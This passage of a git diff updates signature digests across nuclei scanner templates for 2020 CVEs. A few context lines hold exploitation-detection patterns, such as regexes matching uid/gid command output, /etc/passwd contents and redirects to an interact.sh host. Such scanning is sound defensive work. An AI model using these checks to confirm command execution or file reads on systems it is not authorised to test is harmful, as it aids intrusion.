4a0a0047304502203be4d7f5e6cf689779af0571cd7edda9bf8975e0a39de1da9a717cdacffd438c022100c9e14eb45b1c3245277acdf5ad2abab89ea79fd9fac04a3de2d9acfd1d80f272:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502203c096626cafed20dbc9030c3e648a3a819e994aca4d10317129168bc8c75ad8a022100f168d1a5fe31a255db5c80e489a4b64ad9398e69df692ea05e41a8a6a063375b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-13483.yaml b/http/cves/2020/CVE-2020-13483.yaml index 48c121e71d..fd91ebc8a2 100644 --- a/http/cves/2020/CVE-2020-13483.yaml +++ b/http/cves/2020/CVE-2020-13483.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100c969dd14c4d494d022ccf2ee1851599d1a39f7853ce81508bbd20845162ddd8002205f3fb9d87eb78e066c23780860090f71d04bbfcc09ec204574049849d98b144c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022029343ebc38d2dfc9915247a5347f0cb9d35678dfee04d9ffc97299f18e678b660221008aef7a72fe4381a4c785e769b503bd48816987aae9d68f12fe3c47f9855ab647:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-13638.yaml b/http/cves/2020/CVE-2020-13638.yaml index 6efcb4aba4..92ca22db2a 100644 --- a/http/cves/2020/CVE-2020-13638.yaml +++ b/http/cves/2020/CVE-2020-13638.yaml @@ -98,4 +98,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100e7f135f57aac986c270d66ef6afc8f90e89fd565b52145eb6316f4a20da0e4b5022100876e3b9f1953ea0c2910db7241c0c1297552adc50ced66724b0c4758e85e790f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b3478a3d1c9b33da6b94260e9b8106a998818c2fdb902a9b066d1c7ac809980b022100b3023fdeea2e412f562cf99d872c7461a958b671cd1be9c09e039c7051f3922c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-13820.yaml b/http/cves/2020/CVE-2020-13820.yaml index ac464c303a..bedcfa1f6d 100644 --- a/http/cves/2020/CVE-2020-13820.yaml +++ b/http/cves/2020/CVE-2020-13820.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402203b2fba8721ad31fdedf35ac64fd1aa9f3daf248c5a28d0e177bc476aef75fc3b02207c1ceaaceaae8e7f5b2fb30ff8a741683dff8b8466099618f50ab7e864979a62:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100ce13b74076da6e41969c97df7180572b27b2059ee09671905e529bea9d0d559602201a6df1809806daf4998b799697f290e982464680a2e487ba3351b922de9a5c44:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-13851.yaml b/http/cves/2020/CVE-2020-13851.yaml index 49e673cb9c..f193789ad1 100644 --- a/http/cves/2020/CVE-2020-13851.yaml +++ b/http/cves/2020/CVE-2020-13851.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022058dede621391a5c5aa3cbab99614f6e05eb1c25d174cb444fc225088cfc531a3022100d43ab48e876ed266cffa72d5a17bcaf610d3d10d131b046556958fd7be786cf1:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100dfcfb03696c918a1d2747fa228cdf2eaa55b60a14ed1fb030a247100d1586849022100f942bcad8c6242916817db978bfc93199bdc8ce554420e795293b554ca8d1364:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-13927.yaml b/http/cves/2020/CVE-2020-13927.yaml index 11a748d533..45a1234b6f 100644 --- a/http/cves/2020/CVE-2020-13927.yaml +++ b/http/cves/2020/CVE-2020-13927.yaml @@ -47,4 +47,4 @@ http: - '"dag_id":' - '"items":' condition: and -# digest: 490a00463044022039773e3df5e30a54dfb047b567020f8006e6597a61396e83cb36083fa06404a602203435f7eb2403447cd3c27da2a7077ecde3b5ea1c3a9079a9574e26a7831f06b8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502210089cb49c5ce487c095f5369f8734137a3c3d88fd03971899ea3555491c97381a202206551832746d04cb3b44e1eb98ca8aca17348cd625b1791071c1dfc9b3f801d86:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-13937.yaml b/http/cves/2020/CVE-2020-13937.yaml index b6066bb5c7..3b19af5630 100644 --- a/http/cves/2020/CVE-2020-13937.yaml +++ b/http/cves/2020/CVE-2020-13937.yaml @@ -56,4 +56,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502210092081ead1b869e9dda724782ee4de965bc0f0e116474ed366f8d370a14dbb07d02204a4b6cb67c83309c810d2b386aab64f87d5aa13bb183687f94890e463204b1a4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022048463394a260b9e27d8627767494475565f239aa91435a34230d9ff1a6c5bef202202a54d4b9e4a760b03d0247fe9be21b805bd7a370bfe03b66fb302310841fc7a3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-13945.yaml b/http/cves/2020/CVE-2020-13945.yaml index b38f01fd33..6d90732cdd 100644 --- a/http/cves/2020/CVE-2020-13945.yaml +++ b/http/cves/2020/CVE-2020-13945.yaml @@ -71,4 +71,4 @@ http: - type: regex regex: - "((u|g)id|groups)=[0-9]{1,4}\\([a-z0-9]+\\)" -# digest: 4b0a00483046022100efbf11bb66cb565f79edd3f4a95a75ca6939ca6c573155b78208a326bae668400221009ed2eceab8a745e0240bfe7e993f27535e64fdb38bc0758e3f0b33fb42d75345:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100da98ecddbb70a7eb77581e9653fa92b9b159de88c75124492bd32b43a2ea50440221009ebe7190fff83e639145fb240a154245ae8fb4698cae8117916ab2e97469c4d9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-14144.yaml b/http/cves/2020/CVE-2020-14144.yaml index 036c2396dc..5e498b43ba 100644 --- a/http/cves/2020/CVE-2020-14144.yaml +++ b/http/cves/2020/CVE-2020-14144.yaml @@ -102,4 +102,4 @@ http: regex: - name="last_commit" value="(.*)" internal: true -# digest: 4a0a00473045022100e398d9d82ff8b9b88f71c78ed86a11cd12d18203426a0f2396f654d19d04022a0220753f0b26dc09689a5afbbb739a698e8340f6bb5296ac8e88f3fc93d75ab2cd3c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402201f18aedbdadeb2cdc5f30ea26b1d4d98caab9e7ce93029b2fcf5d13b85b935e00220575847d9f812393e7c02727855728df354924f517696bf51d39c47e9a5fcf01b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-14179.yaml b/http/cves/2020/CVE-2020-14179.yaml index 643a09d2cc..562498ec4e 100644 --- a/http/cves/2020/CVE-2020-14179.yaml +++ b/http/cves/2020/CVE-2020-14179.yaml @@ -45,4 +45,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502210096f095a7e5b1890aec761ba02f30068376572d358c7b7f2377be52b71bafe88c02203feeb9b688c168e5c644f45bc6e2e4031cd7a2f541d50bf68d50e45bb9ebd6e4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c3492604fe6ffb150d983c57a55822a1ccaf9544c9acef5270afebceca826124022100bb7cead7683c1f14153ce2f193c2ae3534ffea422cc659852a30be1b6dca1726:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-14181.yaml b/http/cves/2020/CVE-2020-14181.yaml index 030185bfaa..bd7e1f4460 100644 --- a/http/cves/2020/CVE-2020-14181.yaml +++ b/http/cves/2020/CVE-2020-14181.yaml @@ -46,4 +46,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502204aa72378f1d38af3a56bbb872653fe90f1d82c08a7a5a4c2599987f2b07a3a9d022100ad34ea3f11b966b88af4d8f227f8e9b46f7032332c327e80e59e9cd963e2406e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d428c575ce432ed99a51090d8663c82a58604fbcd255a72dbc8032aa665c4d18022100fe7fe775dda4c6526f5df535684f57b1456845031e1b23d41a6b3a5b4da29305:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-14408.yaml b/http/cves/2020/CVE-2020-14408.yaml index 252fc0ba2b..8311477ae9 100644 --- a/http/cves/2020/CVE-2020-14408.yaml +++ b/http/cves/2020/CVE-2020-14408.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100d9c05fb3baf867f35afbb4c5ecbc371b317d9ad9a8ce6ccb6c7fdbc1f3231cf902207c1160d456c6b712685c5c2f9c8f5a2c8102f6d5ec75ce531f6daa39b39f4bd7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022038504a32912735d1e070f9e8d7a17e38206b622b7dbc2246ed290d9c713625c5022055df1771eb09041fa2e67b1dc2cc61d43bb6f7d3a7ce0bb5143ee665ebe2785f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-14413.yaml b/http/cves/2020/CVE-2020-14413.yaml index aacefbd84b..bee192e25c 100644 --- a/http/cves/2020/CVE-2020-14413.yaml +++ b/http/cves/2020/CVE-2020-14413.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4b0a00483046022100a17974c94baa6f004137cf8899e0977bd37030e412c83a9d74273c6477095cfe022100ae2ba0fe9043f67069286b217dd44873f67f994fd877249b7dc65282d21d5c70:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a25b67d8e501fe54a9736f4b60284269c3b3ce22055d5909a746b02bd595b7d70220335a4d343367dbfe91fedd1ae1344d4196d2a81e16b66e21c40e8d4b548e1827:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-14750.yaml b/http/cves/2020/CVE-2020-14750.yaml index 3dff27eb2f..41b8fdbff3 100644 --- a/http/cves/2020/CVE-2020-14750.yaml +++ b/http/cves/2020/CVE-2020-14750.yaml @@ -76,4 +76,4 @@ http: part: body regex: - '(.*)' -# digest: 4b0a0048304602210089aca28d5d41776ea96aa0bb6616121eee0ef6ec762a650669fc5f6e650aab49022100c700af3059d9fd95fe63ddec43493d48232678dc50bc266a2f8cfaa26d4fcc09:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100933ccbbec69c077cf18a07ac71b7a7c533757dd74da93f9010e54cbaa4fbac4a022015131136b25176aa3e188cae6dc1fde89694980c36382c03a062806340676340:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-14864.yaml b/http/cves/2020/CVE-2020-14864.yaml index 012e341c56..8d8250b76f 100644 --- a/http/cves/2020/CVE-2020-14864.yaml +++ b/http/cves/2020/CVE-2020-14864.yaml @@ -48,4 +48,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220301c1ccec08f0b8a2313e6ea62b0556adacd5dd33597547f10af2990730050940221009d500c9bbdf08a1cea7b841a5cbd8ffe901e3271ed97a3a489cd5ab76369ba6e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100a66d77d6339a98d060dad12b13ebb2707fe60346763427bf4124b9aff03bd66f02203d68d914bf164e3bb5103b08ce59889e62010d804383b0066287219f27556e8a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-14882.yaml b/http/cves/2020/CVE-2020-14882.yaml index 834d6545f8..1d64c775ac 100644 --- a/http/cves/2020/CVE-2020-14882.yaml +++ b/http/cves/2020/CVE-2020-14882.yaml @@ -48,4 +48,4 @@ http: part: interactsh_protocol words: - "http" -# digest: 4a0a0047304502210095d334a35f712502dc1161437a7636b7816e79ffa45dee8b16943efbfa63e27e022060fcc3b18130248421a20581edc7d0a8925ec9748890b716418f0e3975cddb70:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022063e0e67a7bb4fe7ce6ba0af44196796b4cffdb8b70fff7af3985ed6ae9398aec02200602c7500ae30ab21eefcaec3c198f470eec8bf5829fd8b342cec48f61b38624:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-14883.yaml b/http/cves/2020/CVE-2020-14883.yaml index 2241d75bda..543fa4712c 100644 --- a/http/cves/2020/CVE-2020-14883.yaml +++ b/http/cves/2020/CVE-2020-14883.yaml @@ -63,4 +63,4 @@ http: - type: status status: - 200 -# digest: 4a0a004730450220201e093d509e8e0c30a242162cc25c66bbca2852bce51d080ac71d69be11f54a022100f450f10b27a270dfab8c3a426da77b84ef41ddae569328908bb2dbd2541fc858:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100f2a44e67034e252b8eaa1368807b0901d4b68001bf88f9e753b0b564821c13680221008d7a817fa839ff050349d9cdaca9fcb3e0de721b3bb9561fa6113f630af30573:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-15129.yaml b/http/cves/2020/CVE-2020-15129.yaml index beaf75cc9a..b5b5cbee31 100644 --- a/http/cves/2020/CVE-2020-15129.yaml +++ b/http/cves/2020/CVE-2020-15129.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 302 -# digest: 4b0a00483046022100c07d30a11232f3e470a77e9b15505d72e8fc22a911ac0d5c2acb28c4edf0400c022100fd575518d252dd3b4ab85b454ff6dac82e4164a2ce65d90dbf7777e8baafbcd3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100eb65852655cf2ffa9857b498f49d741adc084d90e7df1242789ac0a44d43bf34022050f270e7ab62c2fa8a2308cb4efc9e026e0d04f6c0a9874468caf17cd153bc1f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-15148.yaml b/http/cves/2020/CVE-2020-15148.yaml index 707a430ff8..a60306679a 100644 --- a/http/cves/2020/CVE-2020-15148.yaml +++ b/http/cves/2020/CVE-2020-15148.yaml @@ -44,4 +44,4 @@ http: - type: status status: - 500 -# digest: 4a0a00473045022072e95910e14d9ff1be082249e18d6eea72399f1c598e54a6ab12d28549385947022100820179b216116490ccb55a2625b7ae18f47362e1b8e8ec0b6b9f62583b5165a2:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502202f1a6cf25665de90e91bbb0ebe383dbfaba15fb225663e5608fb4c7bccc738ba0221008e53df7ec148d56b49abb761f4706e7c7c403a14fdf56a2d5943d388129cadfd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-15227.yaml b/http/cves/2020/CVE-2020-15227.yaml index 5c04ab91bf..46ede2aed9 100644 --- a/http/cves/2020/CVE-2020-15227.yaml +++ b/http/cves/2020/CVE-2020-15227.yaml @@ -47,4 +47,4 @@ http: part: header words: - "Nette Framework" -# digest: 4b0a00483046022100ac87b598c9067d033995e435c1dcfe2b0a70b19bfcf75c66a3f4d747c6eeeccf022100f651a9eeb8c2b466377b7f3e42ef74086dbc33dbe6c116e69b13f39f71622087:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100d924020a64f0a7063c6caff4a9736f8c76224609cbd1e10c909d94708c8005040221008a11b53aa999e40c444bc485ce3818802a012f25a0c8f2345f5ee1724e189ccf:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-15500.yaml b/http/cves/2020/CVE-2020-15500.yaml index 424e6c8506..89d68c6fed 100644 --- a/http/cves/2020/CVE-2020-15500.yaml +++ b/http/cves/2020/CVE-2020-15500.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100b82ba9a13156e4a5f1bb8fd1ad13f264d34bd2681f97b51a91d33f002823962a02206f63f05020c012282120b381b87214144f8585fc8d81b8e61d1b1614ca448dae:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c4a817a3bf62c93b546943872a006abcedb9e1486cae3c1c1ac90246d2f59d7c022100afbbff76959d05d0167dfd6bfdf2cb8af859278534258eff05a22b63130268d5:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-15568.yaml b/http/cves/2020/CVE-2020-15568.yaml index e7033cf92c..c70899c66c 100644 --- a/http/cves/2020/CVE-2020-15568.yaml +++ b/http/cves/2020/CVE-2020-15568.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100e784ad89af5c1b2c38362287c06a1f7f2ca94adb7a0d811daa81a252f34d401a02200ff9efa5d31f67a479a8e9292f31942deaf5c74cd69d13305223e94c25c60ac8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100eb5e9881c975b01fd774c26fde682becc4c9297a8fd95a089e78ee4c671f7687022100f15c7429c7062548c9d3d9aed0e5c9a062cffdb29573017ef2056e9cec4abf68:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-15867.yaml b/http/cves/2020/CVE-2020-15867.yaml index 9534ddc51c..693c16af64 100644 --- a/http/cves/2020/CVE-2020-15867.yaml +++ b/http/cves/2020/CVE-2020-15867.yaml @@ -101,4 +101,4 @@ http: regex: - name="last_commit" value="(.*)" internal: true -# digest: 4a0a004730450221009a215b7c44f2fb218def60e0d879afe798183c5f934d27d519c1f12a15ae90bd022071abea3ccb7139b8aaf1d296ad270e2afd6df803ea81281e87c092e97711d955:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220634448bc6e6145d018c2163f8a8e5d51214177d2144ccd548e0a8e430cd8a25d022016d72ba966582440fa674d5a0949691d66338e0a04271f3beb6943515d06b2e3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-15895.yaml b/http/cves/2020/CVE-2020-15895.yaml index 949f9cbb72..7bc6078884 100644 --- a/http/cves/2020/CVE-2020-15895.yaml +++ b/http/cves/2020/CVE-2020-15895.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100cc380765700ef1b2b7da3e313af50c0fde3da0fbfcd22a8d457ce221e7fc062b022054cf01c8bbed23df43e959ca8c4f1ca8a91b866aabce40c770d01b43ec7468eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b72b4c809ec1dc73432999836247ed8d875caed6507e71982ff18144ea3f71fc022100af1fb390a0cdb6ba909ee5a666baf036e93eb65594f434c7b42d44c91871c8fb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-16139.yaml b/http/cves/2020/CVE-2020-16139.yaml index d049f9e6f5..b89e3e8745 100644 --- a/http/cves/2020/CVE-2020-16139.yaml +++ b/http/cves/2020/CVE-2020-16139.yaml @@ -49,4 +49,4 @@ http: - type: status status: - 200 -# digest: 490a004630440220159a501f6273ac0121f121b697bdc653c01a5330a5b0fe9fe2ccfa30a638147e022056695f2f7cd28cc34e9a3e87f3d7395878fbebdbc29b626b1b9f94c57c874c78:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022064bf3659fada478043467e0b827681d9b6c1d684ad21bd10712526371d22b0f00220432d723f568bb4b89fc6924e53d733834abb0727932f1f4fe54fcd3ac1db415a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-16846.yaml b/http/cves/2020/CVE-2020-16846.yaml index 227f3054ff..39fd5f5b36 100644 --- a/http/cves/2020/CVE-2020-16846.yaml +++ b/http/cves/2020/CVE-2020-16846.yaml @@ -60,4 +60,4 @@ http: - type: status status: - 500 -# digest: 4b0a00483046022100e5e214d6bfbb716a422d227690fe14f4ced278baebc9530e6be6dda0c04edda5022100a4a672fdb2e3ed1d081264ca1f8709c46adb9bc876251bfd3a0495cb0c41ce47:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100bb3a2ef2a09cde2b0e23692833159a34d6152fbc8b95d31f5e32b51fd28898510220178b71d42f5e15eb57599c8f076105a041de943662f0d07909286c98258f32a9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-16952.yaml b/http/cves/2020/CVE-2020-16952.yaml index 3334e2b247..1f74ed5494 100644 --- a/http/cves/2020/CVE-2020-16952.yaml +++ b/http/cves/2020/CVE-2020-16952.yaml @@ -54,4 +54,4 @@ http: - 200 - 201 condition: or -# digest: 4b0a00483046022100e0bdde1f10a3c7f9e1773ab527f8cb52ceb62bee9d4dd6c22904db572ee54ac9022100e7db923ffc75f38ed9852638743eae25f446b79004905c011578b05d3c7cfc47:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a00473045022100b7dadb5d3fb54a11dbd6440a48bb5cae9db0bfd08dcbec32a08eb7591c6d334e0220357176c8b9439ea772505c04b0752ca005c6da89011edc68685ff5e07be0e38f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-17362.yaml b/http/cves/2020/CVE-2020-17362.yaml index 6712bc6cd1..58ea686416 100644 --- a/http/cves/2020/CVE-2020-17362.yaml +++ b/http/cves/2020/CVE-2020-17362.yaml @@ -54,4 +54,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100ab34023f96ff9b73ad9b41e60f530d15a806426ebaf266dfa573af429f707066022027a8e1e0e951dbd0be795667ca7497abc9000048460f06fbe56fd555a9416315:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a00463044022035c6b0a2f5e0f37aecb7a50199c790522d1949a5044324d708e794146d3db00d0220486c18e76a30d3b21bad9ed11815b355b18ae96686be8d038ffb67cac1c269e7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-17453.yaml b/http/cves/2020/CVE-2020-17453.yaml index 4e045e955d..0abb0f89a3 100644 --- a/http/cves/2020/CVE-2020-17453.yaml +++ b/http/cves/2020/CVE-2020-17453.yaml @@ -52,4 +52,4 @@ http: - type: status status: - 200 -# digest: 4b0a0048304602210092b852f9302eb1a2350db061c59c70735a053c59eb95b4415e36f93732431357022100c8e4a5c459eca3f34966e4ce587f09ac4174a89e0f127b7c9a14f5cf381d461b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402200405d06b7c6abb849ba4dc61041541264ed150d1897a323f895961d136ee6889022072e4173dc43e17f87b8dfc2e4ed666bb4aa8e51f6519916f191fd0377e8acc5a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-17456.yaml b/http/cves/2020/CVE-2020-17456.yaml index 73e1fc696f..3910d2216f 100644 --- a/http/cves/2020/CVE-2020-17456.yaml +++ b/http/cves/2020/CVE-2020-17456.yaml @@ -68,4 +68,4 @@ http: - type: status status: - 200 -# digest: 4a0a00473045022100dfd063b9fa64a8c67ede0a35c9c5ef23fc7ffd9b31d32de5343eaa430bd12815022063f498b2e3e49255cc16b78a9ae2e77f66144915d845e6feae3ced267930d7a9:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100b401c220355e120416b45265ecc5dd5655e000c24e193ecfe986474c671bbb89022100d92a22399dddb6b554da7dfe080987ef24df925d38a5fa5c0c5a46256b5d6776:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-17463.yaml b/http/cves/2020/CVE-2020-17463.yaml index d6ae07a7b1..be557f5a60 100644 --- a/http/cves/2020/CVE-2020-17463.yaml +++ b/http/cves/2020/CVE-2020-17463.yaml @@ -65,4 +65,4 @@ http: - 'status_code_3 == 200' - 'contains(body_1, "FUEL CMS")' condition: and -# digest: 490a0046304402200a2e9d98f445334774bd7fe2ae6afd6669809096d55a82f9b6be1e9015a639f2022025f1354f6fd86600a6cc7c44e2401397db0d4619dc406e7213f617f08f281f9f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402204c4bf6a24a18789f4b4c053b1ede99fad9d47bbe442a41be6d1ff8f46e32a011022050174e6bebe598ce43b4b667f73bc6aad238238abed9332fd136e43b4feaa386:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-17496.yaml b/http/cves/2020/CVE-2020-17496.yaml index a8dd10f9ed..25fdb97add 100644 --- a/http/cves/2020/CVE-2020-17496.yaml +++ b/http/cves/2020/CVE-2020-17496.yaml @@ -50,4 +50,4 @@ http: - type: status status: - 200 -# digest: 4a0a0047304502206afba9382ef50078a6e10f45af89877a09050cee4ee4f09332c699c120cc20570221009ee5bdbc704e8afa38af4a3db4866cc3cae4b1bdec288b453ac41adf3db45155:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402207a5a0d923bbdf64ab39d269258ab52e2092c633b956aeab4d50dab3d8223317a02203e49feb954b4e04ac3ea988112f5d3375d50f6c4382b8bc8e3df588b7d18020e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-17505.yaml b/http/cves/2020/CVE-2020-17505.yaml index 3267e63e23..365714a898 100644 --- a/http/cves/2020/CVE-2020-17505.yaml +++ b/http/cves/2020/CVE-2020-17505.yaml @@ -53,4 +53,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402204bd1705a9455e6871cb3419d303ccfad65755a7bdb6286bf4d77df2f8595aa2202200abf4f4c62097d8b13842832edda25d4bf39ef1baa841854228d08fc794f7316:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a0046304402203656b0e477a05d3fedf942bdba71f0bc4685b49158c9c867b15392d430513ece0220623a926124ebc0171277acfc3108de1c4f55301cb011bf6bf9ae8e56dbad191a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-17519.yaml b/http/cves/2020/CVE-2020-17519.yaml index 4de1a02563..66e381dd62 100644 --- a/http/cves/2020/CVE-2020-17519.yaml +++ b/http/cves/2020/CVE-2020-17519.yaml @@ -42,4 +42,4 @@ http: - type: status status: - 200 -# digest: 490a0046304402204b890b4ec1857214ffda11340aa1a4661bbb5dc35de8a1740ccd531d92910d26022008bfdeb53b6cdc73ff693a31a0ee9b55e4aa92c53dfe39bc0349491462a4f66c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 490a004630440220179e8db378444ec8db5c5fcb3bd64d83ad0ceb26cc06374c7ec3c5bc751dc09f022054ac5e1bbb520228894098569dc41dd3c34633523699f6483e947254d925e389:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-17526.yaml b/http/cves/2020/CVE-2020-17526.yaml index 0c43506c12..f78ac0a36d 100644 --- a/http/cves/2020/CVE-2020-17526.yaml +++ b/http/cves/2020/CVE-2020-17526.yaml @@ -60,4 +60,4 @@ http: - "SLA Misses" - "Task Instances" condition: and -# digest: 4a0a00473045022100f9b0843697463f8e60b12ec56ef0932060ae2d860b8921f95740b592f274713f022053fcc5e9356e6480fab005b56bb10b6931ef145cd764ba9a91e7b44715fcb0cb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4a0a0047304502206d68fd41280e585876cfdefb47cc7394176077ee82533c24194f21850e8f41b3022100cd360805a8b3738cc27c3e08d15f9642e5afa3da79ea8e1e4aabf655a92d615e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-17530.yaml b/http/cves/2020/CVE-2020-17530.yaml index f18447b738..68a849e4e7 100644 --- a/http/cves/2020/CVE-2020-17530.yaml +++ b/http/cves/2020/CVE-2020-17530.yaml @@ -43,4 +43,4 @@ http: part: body regex: - "root:.*:0:0:" -# digest: 4a0a00473045022100fab6e8757fd37c5b780da0990fec386241d3b06313f471ca7ebe8f6a0a31b40f0220726c800f75a906c6acab6cfa704f40f77d520675350c7a3ca2efc97ed9ea7873:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 4b0a00483046022100c95df7b80a699a5c469efd05763166e9336345788dcb921f4d7554984ab97434022100ab616a6d4e61409d715aaf95f946dc4cbdf01bcd1eee0e5b82da8de762627444:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/cves/2020/CVE-2020-18268.yaml b/http/cves/2020/CVE-2020-18268.yaml index 39a235d958..7c54b6480f 100644 --- a/http/cves/2020/CVE-2020-18268.yaml +++ b/http/cves/2020/CVE-2020-18268.yaml @@ -47,4 +47,4 @@ http: part: header regex: - '(?m)^(?:Location\s*?:\s*?)(?:https?:\/\/|\/\/|\/\\\\|\/\\)(?:[a-zA-Z0-9\-_\.@]*)interact\.sh\/?(\/|[^.].*)?$' # https://regex101.com/r/L403F0/1 -# digest: 4a0a00473045022100bd3922005e2f1f83e8fc6d03ed0821320876192c346fd423f1e365de6eecda67022007afefdc8787c536742bd021c8c77fecf9c9783282077289ed30c3e2ee522665:922c64590222798bb761d5b6d8e72950 \ No newline at end of file +# digest: 